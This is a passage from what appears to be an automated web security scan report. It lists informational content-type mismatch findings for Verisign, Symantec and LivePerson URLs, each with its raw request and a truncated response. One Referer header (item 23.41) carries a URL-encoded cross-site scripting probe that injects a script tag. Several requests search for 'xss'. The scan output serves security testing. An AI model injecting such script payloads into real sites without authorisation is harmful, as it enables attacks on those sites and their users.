Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819

Response

HTTP/1.1 200 OK
Status: 200 OK
Content-Type: text/xml
Content-Length: 716
Cache-Control: public, no-cache
Date: Fri, 09 Sep 2011 21:26:08 GMT
Connection: close

iIDd0cueavrMh4p7kKVwfDcKB+ydo50WBbUtMLcgvZOMV/yRRHo/BjHe7Ytn
h3ltGU20Y0cCg8XVm0HlhUPMdTKA+JkrJ5pAHN/j9mrAIR/Jw56Ch+2AScL9
kbgM6ukGT0KwlzosaQtFwR5wEFC0kFnQVUo+wQnxNvAdBozZlJHBiYVlg2SO
JotiY/UdyOFK+TiH1
...[SNIP]...

23.36. http://query.verisign.com/cluster

Summary

Severity:   Information
Confidence:   Firm
Host:   http://query.verisign.com
Path:   /cluster

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=utf-8

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

POST /cluster?coutput=json&q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend&ie=UTF-8&ip=10.244.28.108&access=p&sort=date%3AD%3AL%3Ad1&entqr=1&entsp=0&oe=UTF-8&ud=1 HTTP/1.1
Host: query.verisign.com
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
Content-Length: 0
Origin: http://query.verisign.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Content-Type: text/javascript; charset=utf-8
Cache-Control: max-age=900
Expires: Fri, 09 Sep 2011 21:41:10 GMT
Content-Length: 3685

{"clusters":
[
],
"documents":
[
               {
                   "url": "https://knowledge.verisign.com/support/mpki-for-ssl-support/index?page=content&id=AR1295&pmv=print&actp=PRINT&viewlocale=fr_FR",
                   "title": "Ve
...[SNIP]...

23.37. http://sales.liveperson.net/hcp/html/mTag.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=71097838 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/theme.jsp?themeid=contact-verisign
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315578244934

Response

HTTP/1.1 200 OK
Content-Length: 17291
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=71097838
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:1efe"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Fri, 09 Sep 2011 21:26:51 GMT

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

23.38. https://seal.verisign.com/getseal

Summary

Severity:   Information
Confidence:   Firm
Host:   https://seal.verisign.com
Path:   /getseal

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /getseal HTTP/1.1
Host: seal.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, must-revalidate
ETag:
Content-Type: text/javascript
Date: Fri, 09 Sep 2011 21:46:24 GMT
Connection: close

<!-- x=1; -->

23.39. http://sr2.liveperson.net/hcp/html/mTag.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sr2.liveperson.net
Path:   /hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=71097838 HTTP/1.1
Host: sr2.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/store/resources/index.jsp?inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=71097838
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:27d6"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 17291
Date: Fri, 09 Sep 2011 21:31:14 GMT
Connection: close

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

23.40. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /connect/sites/default/themes/connect2/images/favicon.ico HTTP/1.1
Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 05 Oct 2010 02:54:35 GMT
ETag: "a680e3-47e-491d5c7eb70c0"
Content-Type: text/plain; charset=UTF-8
X-Varnish: 312037258
Vary: Accept-Encoding
Content-Length: 1150
Cache-Control: max-age=18988
Date: Fri, 09 Sep 2011 21:34:12 GMT
Connection: close

............ .h.......(....... ..... .....@......................................>...........................................................q...................................9......................
...[SNIP]...

23.41. http://www.symantec.com/s/searchg/suggest

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.symantec.com
Path:   /s/searchg/suggest

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain JSON.

Request

GET /s/searchg/suggest?q=xss&max=10&site=symc_en_US&client=symc_en_US&access=p&format=rich HTTP/1.1
Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622023420-New%7C1336358023420%3B%20event69%3Devent69%7C1336358023421%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Content-Length: 81
Expires: Fri, 09 Sep 2011 21:33:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 09 Sep 2011 21:33:41 GMT
Connection: close
Vary: Accept-Encoding

{ "query":"xss", "results": [ {"name":"xss-vulnerabilities", "type":"suggest"}] }

23.42. http://www.symantec.com/search/searchjs.jsp

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.symantec.com
Path:   /search/searchjs.jsp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /search/searchjs.jsp?lg=en&ct=us&sg=business HTTP/1.1
Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://searchg.symantec.com/search?as_sitesearch=www.symantec.com/connect/blogs&q=xss&charset=utf-8&proxystylesheet=symc_en_US&client=symc_en_US&hitsceil=100&site=symc_en_US&output=xml_no_dtd&context=ent&x=0&y=0&ie=UTF-8&ip=50.23.123.106&access=p&sort=date:D:L:d1&entqr=0&entsp=a&oe=UTF-8&ud=1
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622035736-New%7C1336358035736%3B%20event69%3Devent69%7C1336358035737%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 6094
Cache-Control: public, max-age=3548
Date: Fri, 09 Sep 2011 21:33:39 GMT
Connection: close


var omniture_region = "NAM";
var omniture_country = "us";
var omniture_language = "en";
var more_results = "More results from";
var site_name = "Symantec.com";
var breadcrumb_search_title = "Search
...[SNIP]...

23.43. http://www.verisign.ch/assets/global/js/leftnav.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.verisign.ch
Path:   /assets/global/js/leftnav.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /assets/global/js/leftnav.js HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/contact-information/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Length: 4994
Content-Type: text/html

/**
* Version 2.0
* Author: Rob Perez
* Date: August 20, 2010
*
* Usage:
*
*    Set a flag at the beginning of generateLeftNav to modify expansion behavior of the nav if desired.
*
* Somew
...[SNIP]...

23.44. http://www.verisign.ch/assets/shared/js/jquery.url.packed.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.verisign.ch
Path:   /assets/shared/js/jquery.url.packed.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /assets/shared/js/jquery.url.packed.js HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/contact-information/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Length: 1935
Content-Type: text/html

jQuery.url=function(){var segments={};var parsed={};var options={url:window.location,strictMode:false,key:["source","protocol","authority","userInfo","user","password","host","port","relative","path",
...[SNIP]...

23.45. http://www.verisign.ch/assets/shared/js/leftnav_new.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.verisign.ch
Path:   /assets/shared/js/leftnav_new.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /assets/shared/js/leftnav_new.js HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621625|session#1315621535113-743172#1315623425|PC#1315621455064-973488.19#1378693568; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.3.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Length: 4994
Content-Type: text/html

/**
* Version 2.0
* Author: Rob Perez
* Date: August 20, 2010
*
* Usage:
*
*    Set a flag at the beginning of generateLeftNav to modify expansion behavior of the nav if desired.
*
* Somew
...[SNIP]...

23.46. http://www.verisign.ch/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.verisign.ch
Path:   /stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/contact-information/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Content-Length: 22346

////////////////////////////////////
//Main JS functions for verisign.com
////////////////////////////////////

function findObj(n, d){
var p,i,x; if(!d) d=document;
if((p=n.indexOf("?"))>0&&pa
...[SNIP]...

23.47. http://www.verisign.ch/stellent/fragments/vrsnJSAssets/vrsnNavMenuElements.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.verisign.ch
Path:   /stellent/fragments/vrsnJSAssets/vrsnNavMenuElements.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /stellent/fragments/vrsnJSAssets/vrsnNavMenuElements.js HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/contact-information/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Length: 3364
Content-Type: text/html

/////////////////////////////////////////////////////////////////////////////
// Function : vrsnNavMenuElements
// Comments :
/////////////////////////////////////////////////////////////////////////
...[SNIP]...

23.48. http://www.verisign.com/authweb/global/assets/header/js/flyouts.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.verisign.com
Path:   /authweb/global/assets/header/js/flyouts.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /authweb/global/assets/header/js/flyouts.js HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://blogs.verisign.com/?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:25:18 GMT
Content-Type: text/html
Content-Length: 8048


//----------------------------------------//
// My Account M-flyout form functionality
//----------------------------------------//

$("#myacc_search_btn").click(function(){
   //document.get
...[SNIP]...

23.49. http://www.verisign.com/authweb/global/assets/header/js/header.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.verisign.com
Path:   /authweb/global/assets/header/js/header.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /authweb/global/assets/header/js/header.js HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://blogs.verisign.com/?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:25:18 GMT
Content-Length: 1558
Content-Type: text/html


/*******************************************
**             Header functions             **
*******************************************/
//----------------------------------------//
//Load Defaults when DOM i
...[SNIP]...

23.50. http://www.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.verisign.com
Path:   /authweb/global/assets/header/js/jquery.autocomplete.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /authweb/global/assets/header/js/jquery.autocomplete.js HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://blogs.verisign.com/?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:25:19 GMT
Content-Type: text/html
Content-Length: 22148

/*
* jQuery Autocomplete plugin 1.1
*
* Copyright (c) 2009 Jörn Zaefferer
*
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* ht
...[SNIP]...

23.51. http://www.verisign.com/authweb/global/assets/shared/images/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.verisign.com
Path:   /authweb/global/assets/shared/images/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /authweb/global/assets/shared/images/favicon.ico HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621614|session#1315621455064-973488#1315623414|PC#1315621455064-973488.19#1378693554; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
Last-Modified: Wed, 19 Jan 2011 20:24:14 GMT
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:26:10 GMT
Content-Type: text/html

............ .h.......(....... ..... .....@......................................>...........................................................q...................................9......................
...[SNIP]...

23.52. http://www.verisign.com/authweb/global/assets/shared/images/partners-featured-ssl-promo.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.verisign.com
Path:   /authweb/global/assets/shared/images/partners-featured-ssl-promo.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /authweb/global/assets/shared/images/partners-featured-ssl-promo.jpg HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:24:47 GMT
Server: Apache
Last-Modified: Wed, 19 Jan 2011 20:24:14 GMT
Accept-Ranges: bytes
Content-Length: 15431
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:24:47 GMT
Content-Type: image/jpeg

GIF89a..............Os.............l.qqr.......-...........Yg......"?|NP......................$H..............................NQe.N+.....u.q..........3ny..4^..........<{...............Z:&1......?f....
...[SNIP]...

23.53. http://www.verisign.com/authweb/global/assets/shared/images/ps-freetrial-promo.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.verisign.com
Path:   /authweb/global/assets/shared/images/ps-freetrial-promo.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /authweb/global/assets/shared/images/ps-freetrial-promo.jpg HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

